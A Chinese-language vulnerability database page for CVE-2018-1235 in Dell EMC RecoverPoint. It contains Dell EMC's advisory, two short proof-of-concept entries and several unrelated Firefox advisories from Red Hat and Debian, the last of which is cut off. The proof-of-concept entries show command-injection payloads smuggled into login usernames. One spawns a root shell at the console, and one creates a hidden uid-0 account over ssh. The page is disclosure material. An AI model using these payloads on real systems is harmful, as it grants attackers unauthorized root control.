CVE-2018-1235
CVSS10.0
发布时间 :2018-05-29 13:29:00
修订时间 :2018-06-29 14:49:41
NMPS    

[原文]Dell EMC RecoverPoint versions prior to 5.1.2 and RecoverPoint for VMs versions prior to 5.1.1.3, contain a command injection vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to execute arbitrary commands on the affected system with root privilege.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-77 [在命令中使用的特殊元素转义处理不恰当(命令注入)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1235
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1235
(官方数据源) NVD

- 其它链接及资源

http://seclists.org/fulldisclosure/2018/May/61
(VENDOR_ADVISORY)  FULLDISC  20180522 DSA-2018-095: Dell EMC RecoverPoint Multiple Vulnerabilities
http://www.securityfocus.com/bid/104246
(VENDOR_ADVISORY)  BID  104246
https://www.exploit-db.com/exploits/44920/
(VENDOR_ADVISORY)  EXPLOIT-DB  44920

- 漏洞信息 (F147925)

Dell EMC RecoverPoint Command Injection / LDAP Password Leak / File Read (PacketStormID:F147925)
2018-05-28 00:00:00
Paul Taylor  emc.com
advisory,arbitrary,vulnerability
CVE-2018-1235,CVE-2018-1241,CVE-2018-1242
[点击下载]

Dell EMC RecoverPoint versions prior to 5.1.2 and Dell EMC RecoverPoint Virtual Machine (VM) versions prior to 5.1.1.3 suffer from command injection, LDAP password leak, and arbitrary file read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

DSA-2018-095: Dell EMC RecoverPoint Multiple Vulnerabilities

EMC Identifier:	DSA-2018-095

CVE Identifier: CVE-2018-1235, CVE-2018-1241, CVE-2018-1242

Severity Rating: CVSS Base Score: See below for CVSSv3 Scores.

Affected products: 
Dell EMC RecoverPoint versions prior to 5.1.2
Dell EMC RecoverPoint Virtual Machine (VM) versions prior to 5.1.1.3

Summary:  
Dell EMC RecoverPoint addresses multiple security vulnerabilities which may potentially be exploited by malicious users to compromise the affected system.

Details:
Unauthenticated Command Injection Vulnerability

CVE-2018-1235

Dell EMC RecoverPoint versions prior to 5.1.2 and RecoverPoint for VMs versions prior to 5.1.1.3, contain a command injection vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to execute arbitrary commands on the affected system with root privilege.

CVSSv3 Base Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

LDAP Password Disclosure Vulnerability

CVE-2018-1241

Dell EMC RecoverPoint versions prior to 5.1.2 and RecoverPoint for VMs versions prior to 5.1.1.3, under certain conditions, may leak LDAP password in plain-text into the RecoverPoint log file. An authenticated malicious user with access to the RecoverPoint log files may obtain the exposed LDAP password to use it in further attacks.

CVSSv3 Base Score: 6.1 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N)

Authenticated Arbitrary File Read Vulnerability

CVE-2018-1242

Dell EMC RecoverPoint versions prior to 5.1.2 and RecoverPoint for VMs versions prior to 5.1.1.3, contains a command injection vulnerability in the Boxmgmt CLI. An authenticated malicious user with boxmgmt privileges may potentially exploit this vulnerability to read RPA files. Note that files that require root permission cannot be read.

CVSSv3 Base Score: 6.7 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

Resolution:	
The following Dell EMC RecoverPoint releases addresses these vulnerabilities: 

Dell EMC RecoverPoint for Virtual Machines 5.1.1.3 and later

Dell EMC RecoverPoint 5.1.2 and later

Dell EMC recommends all customers upgrade at the earliest opportunity. In addition, to fully mitigate CVE-2018-1241, customers are recommended to change their LDAP passwords.

Note: It is a security best practice to change any default system passwords to strong and unique values. Refer to RecoverPoint Security Configuration Guide for details. Refer to Dell EMC Knowledge Base Article 520937 for instructions on how to change default root password in RecoverPoint systems.

Link To Remedies:	
Customers can download software from EMC Online Suport at https://support.emc.com/search/?text=RecoverPoint&searchLang=en_US&facetResource=DOWN

Credits:
Dell EMC would like to thank Paul Taylor (@bao7uo) from Foregenix Ltd for reporting these vulnerabilities.

Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from 
the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical 
Support at 1-877-534-2867.

For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers 
take into account both the base score and any relevant temporal and environmental scores which may impact the potential 
severity associated with particular security vulnerability.

EMC recommends that all users determine the applicability of this information to their individual situations and take 
appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims 
all warranties, either express or implied, including the warranties of merchantability, fitness for a particular 
purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever 
including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of 
liability for consequential or incidental damages, so the foregoing limitation may not apply.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBCAAGBQJbAtF7AAoJEHbcu+fsE81Z5YYH/3ltdBwWAKvTIkWHK7c2CrT6
JLIf1NyTCQdT8yfjCAtmmThN0q/1KwrtBm31/btbkDRAIFOiJU/L7FSTi/TPUw6Y
Y2H28D8vQ3fft1g8Uv4fIqx5X6FD/R8N5mpmANo8G73j0INLNm+JnqBS3BOVBU3g
L01OHMuLiabtFARcWvQ2QXJfd4yJAydvHe6r6/nY+5kC30uoLFr+yEFvGdyyWPxh
wMw492QrSuesy5Pft9degWvZrZelKNN6hitTSxrr5SKotHCEsmrmXeY/7R8jAsuV
ad3h1hwEtCxUNCdBOiZFRf8zKwWzc7+fVJ7QcWIpDbB2BTSlFE2d41lx5xGgvIY=
=qlnC
-----END PGP SIGNATURE-----


    

- 漏洞信息 (F148269)

Dell EMC RecoverPoint Local Root Command Execution (PacketStormID:F148269)
2018-06-21 00:00:00
Paul Taylor  
exploit,local,root
CVE-2018-1235
[点击下载]

Dell EMC RecoverPoint versions prior to 5.1.2 suffer from a local root command execution vulnerability.

# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution
# Date: 2018-06-21
# Exploit Author: Paul Taylor
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: CVE-2018-1235
  
# 1. Description
# An OS command injection vulnerability exists in the mechanism which processes usernames 
# which are presented for authentication, allowing unauthenticated root access 
# via tty console login.
  
# 2. Proof of Concept
# Inject into local tty console login prompt
 
recoverpoint login: $(bash > &2)
root@recoverpoint:/# id
uid=0(root) gid=0(root) groups=0(root)
root@recoverpoint:/#

    

- 漏洞信息 (F148265)

Dell EMC RecoverPoint Remote Root (PacketStormID:F148265)
2018-06-21 00:00:00
Paul Taylor  
exploit,remote,root
CVE-2018-1235
[点击下载]

Dell EMC RecoverPoint versions prior to 5.1.2 suffer from a remote root command execution vulnerability.

# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution
# Date: 2018-06-21
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Exploit Author: Paul Taylor
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: CVE-2018-1235
  
# 1. Description
# An OS command injection vulnerability exists in the mechanism which processes usernames 
# which are presented for authentication, allowing unauthenticated root access via 
# the ssh service.
  
# 2. Proof of Concept
# Inject into ssh username.
# N.B. combined length of new username+password is limited to 21 due to injection length limitations
 
$ ssh '$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)'@192.168.57.3
Password: ^C
$ ssh bao7uo@192.168.57.3
Password: Secret123
Could not chdir to home directory /home/bao7uo: No such file or directory
root@recoverpoint:/# id
uid=0(root) gid=0(root) groups=0(root)
root@recoverpoint:/#


    

- 漏洞信息 (F148355)

Red Hat Security Advisory 2018-2112-01 (PacketStormID:F148355)
2018-06-29 00:00:00
Red Hat  
advisory,web,overflow,vulnerability,csrf
linux,redhat
CVE-2017-7762,CVE-2018-12359,CVE-2018-12360,CVE-2018-12362,CVE-2018-12363,CVE-2018-12364,CVE-2018-12365,CVE-2018-12366,CVE-2018-5156,CVE-2018-5188,CVE-2018-6126
[点击下载]

Red Hat Security Advisory 2018-2112-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 60.1.0 ESR. Issues addressed include buffer overflow, cross site request forgery, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Critical: firefox security update
Advisory ID:       RHSA-2018:2112-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2018:2112
Issue date:        2018-06-28
CVE Names:         CVE-2017-7762 CVE-2018-5156 CVE-2018-5188 
                   CVE-2018-6126 CVE-2018-12359 CVE-2018-12360 
                   CVE-2018-12362 CVE-2018-12363 CVE-2018-12364 
                   CVE-2018-12365 CVE-2018-12366 
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards
compliance, performance, and portability.

This update upgrades Firefox to version 60.1.0 ESR.

Security Fix(es):

* Mozilla: Memory safety bugs fixed in Firefox 61, Firefox ESR 60.1, and
Firefox ESR 52.9 (CVE-2018-5188)

* Mozilla: Buffer overflow using computed size of canvas element
(CVE-2018-12359)

* Mozilla: Use-after-free using focus() (CVE-2018-12360)

* Mozilla: Media recorder segmentation fault when track type is changed
during capture (CVE-2018-5156)

* Skia: Heap buffer overflow rasterizing paths in SVG (CVE-2018-6126)

* Mozilla: Integer overflow in SSSE3 scaler (CVE-2018-12362)

* Mozilla: Use-after-free when appending DOM nodes (CVE-2018-12363)

* Mozilla: CSRF attacks through 307 redirects and NPAPI plugins
(CVE-2018-12364)

* Mozilla: address bar username and password spoofing in reader mode
(CVE-2017-7762)

* Mozilla: Compromised IPC child process can list local filenames
(CVE-2018-12365)

* Mozilla: Invalid data handling during QCMS transformations
(CVE-2018-12366)

For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.

Red Hat would like to thank the Mozilla project for reporting these issues.
Upstream acknowledges Alex Gaynor, Christoph Diehl, Christian Holler, Jason
Kratzer, David Major, Jon Coppeard, Nicolas B. Pierron, Marcia Knous,
Ronald Crane, Nils, F. Alonso (revskills), David Black, and OSS-Fuzz as the
original reporters.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1584035 - CVE-2018-6126 Skia: Heap buffer overflow rasterizing paths in SVG
1590493 - CVE-2017-7762 Mozilla: address bar username and password spoofing in reader mode
1595024 - CVE-2018-12359 Mozilla: Buffer overflow using computed size of canvas element
1595025 - CVE-2018-12360 Mozilla: Use-after-free using focus()
1595027 - CVE-2018-12362 Mozilla: Integer overflow in SSSE3 scaler
1595028 - CVE-2018-12363 Mozilla: Use-after-free when appending DOM nodes
1595029 - CVE-2018-12364 Mozilla: CSRF attacks through 307 redirects and NPAPI plugins
1595030 - CVE-2018-12365 Mozilla: Compromised IPC child process can list local filenames
1595031 - CVE-2018-12366 Mozilla: Invalid data handling during QCMS transformations
1595037 - CVE-2018-5156 Mozilla: Media recorder segmentation fault when track type is changed during capture
1595040 - CVE-2018-5188 Mozilla: Memory safety bugs fixed in Firefox 61, Firefox ESR 60.1, and Firefox ESR 52.9

6. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source:
firefox-60.1.0-5.el6.src.rpm

i386:
firefox-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm

x86_64:
firefox-60.1.0-5.el6.x86_64.rpm
firefox-debuginfo-60.1.0-5.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

x86_64:
firefox-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Source:
firefox-60.1.0-5.el6.src.rpm

x86_64:
firefox-60.1.0-5.el6.i686.rpm
firefox-60.1.0-5.el6.x86_64.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source:
firefox-60.1.0-5.el6.src.rpm

i386:
firefox-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm

ppc64:
firefox-60.1.0-5.el6.ppc64.rpm
firefox-debuginfo-60.1.0-5.el6.ppc64.rpm

s390x:
firefox-60.1.0-5.el6.s390x.rpm
firefox-debuginfo-60.1.0-5.el6.s390x.rpm

x86_64:
firefox-60.1.0-5.el6.x86_64.rpm
firefox-debuginfo-60.1.0-5.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

x86_64:
firefox-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source:
firefox-60.1.0-5.el6.src.rpm

i386:
firefox-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm

x86_64:
firefox-60.1.0-5.el6.x86_64.rpm
firefox-debuginfo-60.1.0-5.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

x86_64:
firefox-60.1.0-5.el6.i686.rpm
firefox-debuginfo-60.1.0-5.el6.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2017-7762
https://access.redhat.com/security/cve/CVE-2018-5156
https://access.redhat.com/security/cve/CVE-2018-5188
https://access.redhat.com/security/cve/CVE-2018-6126
https://access.redhat.com/security/cve/CVE-2018-12359
https://access.redhat.com/security/cve/CVE-2018-12360
https://access.redhat.com/security/cve/CVE-2018-12362
https://access.redhat.com/security/cve/CVE-2018-12363
https://access.redhat.com/security/cve/CVE-2018-12364
https://access.redhat.com/security/cve/CVE-2018-12365
https://access.redhat.com/security/cve/CVE-2018-12366
https://access.redhat.com/security/updates/classification/#critical
https://www.mozilla.org/en-US/security/advisories/mfsa2018-16/

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2018 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBWzUKi9zjgjWX9erEAQg5MBAAmzV+4fAoDkgZGE6nJbFRkIyE3lUKs1l1
dqHydI45j0eAOPqHM0Ro3TvathkedgNBiw2IOSFi7OeXfzfs8XWGUaIUaYIBUyGu
3qOCJpsXnKGffW+2PE1WK14n5rrKbZlHtfKU5CE6BVmVOYjfPBx+JzL9EadY4Lpe
hGcA97zTOrT3ZmqyXGwJUYo7RXMF9YFDVlHgNNNDuVU+Ju4PUpvClsNbart0yIQa
gtHzD9KRqngcyjzkk1yKZ4HKsAXRWD5StJOprOVDlAY6mYPRfTtG4UJHfvaAukzl
xrEYwSqkjliKXYFbreYI52CzGit05l9OiFhStc44ImpgjR6/QzfKWmlgxfFQXx3+
NCLF8pwC0DZ0FQDjX99yf91SCAle4H+rITM38nPk9Hej3x4PQx3Z8x23X5LCPUSG
w4F+W2NgHjrlGnS5mzYzVxLGZ8ekn5X4h12t2h/JvmsSNgeHgnrKRRKBZwYBx1qD
nx5HQ/JyUwee93CAupq3creAxSr29dD7HTrS0uEP8q3yBt2SW3d0zFmNKwH2He4J
E/EKU63RHWcVbA5/QK/7h7qNrx0Dq+HlwFwpmGVDsdJUjOZ357212XROJOPS2mtF
ue0gcNNE331LuiQz595CgL8sLbyTtbliOs0+iYmydIYYht3OfcaQ7v1ZDKS3vJ04
5iiuGmfKjnE=
=TKtE
-----END PGP SIGNATURE-----

--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
    

- 漏洞信息 (F148354)

Red Hat Security Advisory 2018-2113-01 (PacketStormID:F148354)
2018-06-29 00:00:00
Red Hat  
advisory,web,overflow,vulnerability,csrf
linux,redhat
CVE-2017-7762,CVE-2018-12359,CVE-2018-12360,CVE-2018-12362,CVE-2018-12363,CVE-2018-12364,CVE-2018-12365,CVE-2018-12366,CVE-2018-5156,CVE-2018-5188,CVE-2018-6126
[点击下载]

Red Hat Security Advisory 2018-2113-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 60.1.0 ESR. Issues addressed include buffer overflow, cross site request forgery, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Critical: firefox security update
Advisory ID:       RHSA-2018:2113-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2018:2113
Issue date:        2018-06-28
CVE Names:         CVE-2017-7762 CVE-2018-5156 CVE-2018-5188 
                   CVE-2018-6126 CVE-2018-12359 CVE-2018-12360 
                   CVE-2018-12362 CVE-2018-12363 CVE-2018-12364 
                   CVE-2018-12365 CVE-2018-12366 
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards
compliance, performance, and portability.

This update upgrades Firefox to version 60.1.0 ESR.

Security Fix(es):

* Mozilla: Memory safety bugs fixed in Firefox 61, Firefox ESR 60.1, and
Firefox ESR 52.9 (CVE-2018-5188)

* Mozilla: Buffer overflow using computed size of canvas element
(CVE-2018-12359)

* Mozilla: Use-after-free using focus() (CVE-2018-12360)

* Mozilla: Media recorder segmentation fault when track type is changed
during capture (CVE-2018-5156)

* Skia: Heap buffer overflow rasterizing paths in SVG (CVE-2018-6126)

* Mozilla: Integer overflow in SSSE3 scaler (CVE-2018-12362)

* Mozilla: Use-after-free when appending DOM nodes (CVE-2018-12363)

* Mozilla: CSRF attacks through 307 redirects and NPAPI plugins
(CVE-2018-12364)

* Mozilla: address bar username and password spoofing in reader mode
(CVE-2017-7762)

* Mozilla: Compromised IPC child process can list local filenames
(CVE-2018-12365)

* Mozilla: Invalid data handling during QCMS transformations
(CVE-2018-12366)

For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.

Red Hat would like to thank the Mozilla project for reporting these issues.
Upstream acknowledges Alex Gaynor, Christoph Diehl, Christian Holler, Jason
Kratzer, David Major, Jon Coppeard, Nicolas B. Pierron, Marcia Knous,
Ronald Crane, Nils, F. Alonso (revskills), David Black, and OSS-Fuzz as the
original reporters.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1584035 - CVE-2018-6126 Skia: Heap buffer overflow rasterizing paths in SVG
1590493 - CVE-2017-7762 Mozilla: address bar username and password spoofing in reader mode
1595024 - CVE-2018-12359 Mozilla: Buffer overflow using computed size of canvas element
1595025 - CVE-2018-12360 Mozilla: Use-after-free using focus()
1595027 - CVE-2018-12362 Mozilla: Integer overflow in SSSE3 scaler
1595028 - CVE-2018-12363 Mozilla: Use-after-free when appending DOM nodes
1595029 - CVE-2018-12364 Mozilla: CSRF attacks through 307 redirects and NPAPI plugins
1595030 - CVE-2018-12365 Mozilla: Compromised IPC child process can list local filenames
1595031 - CVE-2018-12366 Mozilla: Invalid data handling during QCMS transformations
1595037 - CVE-2018-5156 Mozilla: Media recorder segmentation fault when track type is changed during capture
1595040 - CVE-2018-5188 Mozilla: Memory safety bugs fixed in Firefox 61, Firefox ESR 60.1, and Firefox ESR 52.9

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:
firefox-60.1.0-4.el7_5.src.rpm

x86_64:
firefox-60.1.0-4.el7_5.x86_64.rpm
firefox-debuginfo-60.1.0-4.el7_5.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:
firefox-60.1.0-4.el7_5.i686.rpm
firefox-debuginfo-60.1.0-4.el7_5.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:
firefox-60.1.0-4.el7_5.src.rpm

ppc64:
firefox-60.1.0-4.el7_5.ppc64.rpm
firefox-debuginfo-60.1.0-4.el7_5.ppc64.rpm

ppc64le:
firefox-60.1.0-4.el7_5.ppc64le.rpm
firefox-debuginfo-60.1.0-4.el7_5.ppc64le.rpm

s390x:
firefox-60.1.0-4.el7_5.s390x.rpm
firefox-debuginfo-60.1.0-4.el7_5.s390x.rpm

x86_64:
firefox-60.1.0-4.el7_5.x86_64.rpm
firefox-debuginfo-60.1.0-4.el7_5.x86_64.rpm

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):

Source:
firefox-60.1.0-4.el7_5.src.rpm

aarch64:
firefox-60.1.0-4.el7_5.aarch64.rpm
firefox-debuginfo-60.1.0-4.el7_5.aarch64.rpm

ppc64le:
firefox-60.1.0-4.el7_5.ppc64le.rpm
firefox-debuginfo-60.1.0-4.el7_5.ppc64le.rpm

s390x:
firefox-60.1.0-4.el7_5.s390x.rpm
firefox-debuginfo-60.1.0-4.el7_5.s390x.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:
firefox-60.1.0-4.el7_5.i686.rpm
firefox-debuginfo-60.1.0-4.el7_5.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
firefox-60.1.0-4.el7_5.src.rpm

x86_64:
firefox-60.1.0-4.el7_5.x86_64.rpm
firefox-debuginfo-60.1.0-4.el7_5.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:
firefox-60.1.0-4.el7_5.i686.rpm
firefox-debuginfo-60.1.0-4.el7_5.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2017-7762
https://access.redhat.com/security/cve/CVE-2018-5156
https://access.redhat.com/security/cve/CVE-2018-5188
https://access.redhat.com/security/cve/CVE-2018-6126
https://access.redhat.com/security/cve/CVE-2018-12359
https://access.redhat.com/security/cve/CVE-2018-12360
https://access.redhat.com/security/cve/CVE-2018-12362
https://access.redhat.com/security/cve/CVE-2018-12363
https://access.redhat.com/security/cve/CVE-2018-12364
https://access.redhat.com/security/cve/CVE-2018-12365
https://access.redhat.com/security/cve/CVE-2018-12366
https://access.redhat.com/security/updates/classification/#critical
https://www.mozilla.org/en-US/security/advisories/mfsa2018-16/

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2018 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBWzUKfdzjgjWX9erEAQgHFQ//aGKfPEhzZzA6taZmjMoPMT0QpNrUEJNU
tdlVk2rR54baPn5SFody4yTeI/B/poCnZkvopzFpD6cTyTHZpxM1DUWvKTFG0Ziw
xAoF6qiZXZ42j3XU/NQaNAxsx5EQgD6BMc0cdDebDl2yaEZRu/Menc4qY06EmIDi
4JiU5QT8C2RuFEL5Bq3qZmKDoPyUpA26Y9YOji/6hOKG5aEQ0cGF/ergmXAtCVcH
6SzvLjkSX5iW9Z+2bdfzQg6sp2wbY/NgHv6+Fz2SdFG3jhpcNTCz+gUkow4zlMiV
AI5kY2kXNwxKLn58x8rjvDl3VypQZHUeyWRzt6SZPqNE++hy4+mUYgW9wng2/ruR
/jR+lz64klpPLzghnag4gRYaSdV6PG7Ps0mY60xu2HfScNpDeT2vHZqVXnP7iMoC
9V3zLCjHoLALOOVVW90vW5y83Cvi6E5Y4hOGeOnH60UPf9O5lcC51miC0D7z2GX2
3Rvz8VMRcC1MDp1OWvfhgH3kGq/zVbaxYjh1KV1YW4jtHfk0srEy/oH0c7cJVkjg
cyReFPknICBUH5T37MiFUBgAEdtN7rFW+b8HSwOpxJXXVTf5W4mLsMeOGgHwLywS
sFGnrYWmubb08nCQgXB7jFv8l5nezuNU68OuuAOWp7yW7P9gFSdGIsUCwHV1C+hj
N0CBttXF8Wc=
=TFZf
-----END PGP SIGNATURE-----

--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
    

- 漏洞信息 (F148353)

Debian Security Advisory 4235-1 (PacketStormID:F148353)
2018-06-29 00:00:00
Debian  debian.org
advisory,web,denial of service,arbitrary,info disclosure,csrf
linux,debian
CVE-2018-12359,CVE-2018-12360,CVE-2018-12362,CVE-2018-12363,CVE-2018-12364,CVE-2018-12365,CVE-2018-12366,CVE-2018-5156
[点击下载]

Debian Linux Security Advisory 4235-1 - Several security issues have been found in the Mozilla Firefox web lead to the execution of arbitrary code, denial of service, cross-site request forgery or information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4235-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
June 27, 2018                         https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : firefox-esr
CVE ID         : CVE-2018-5156 CVE-2018-12359 CVE-2018-12360 CVE-2018-12362 
                 CVE-2018-12363 CVE-2018-12364 CVE-2018-12365 CVE-2018-12366

Several security issues have been found in the Mozilla Firefox web
browser: Multiple memory safety errors and other implementation errors may
lead to the execution of arbitrary code, denial of service, cross-site
request forgery or information disclosure.

For the stable distribution (stretch), these problems have been fixed in
version 52.9.0esr-1~deb9u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlsz51EACgkQEMKTtsN8
TjaG5g//VNB8C+k6qWT7/svPY3xpkUzbgcCVnzaa715RG+iOSvLIcN8L3cJtUNPT
a0iaKz3J1LRKq4sacKXGTLp33ydhLGaLKUdSlcqFwibbnHE5IFhFjE9rtkUHiaVe
NL5Qxfwvv7O5pkOdXffXLJF1Steh6/tP/BJZAmkZYPpZZm/VCr8Mziro64MP4wju
IdRd0mNZc7kqrH4kR3mwPCAldr6nHWbovKOemavsSns6EL+8sRbNQMDxPToRF9ms
j9LdKaTRWG+0jDO9Kq1dmd/lxzirm8hKMICzlJk609QsPBt82x2T0pJ3n4ZQDIRQ
ezwd2RM/h8fRgNN+EO73JF62jSBqEoM+2ohsE7nYQFk9b/IAJt/vxb+yQnVMgkEd
N3UE5MRT5jRUNnNSaSsrxa7NyYcMRLiz0m8Tkd1xv2S3la4FPu59EwCn7OxuM1jU
3SQH+sn6Dc8JXlIabZf3GnjMIkd534yqHzwkOxNaQRwizfufdq+PjE4lAwiqhbzG
gO9Z99vr3rAGhriiMtFaLgLioewM+tv4AXPn6Y/Hm5OLn+OYrKERrLmmWgQ4SSiU
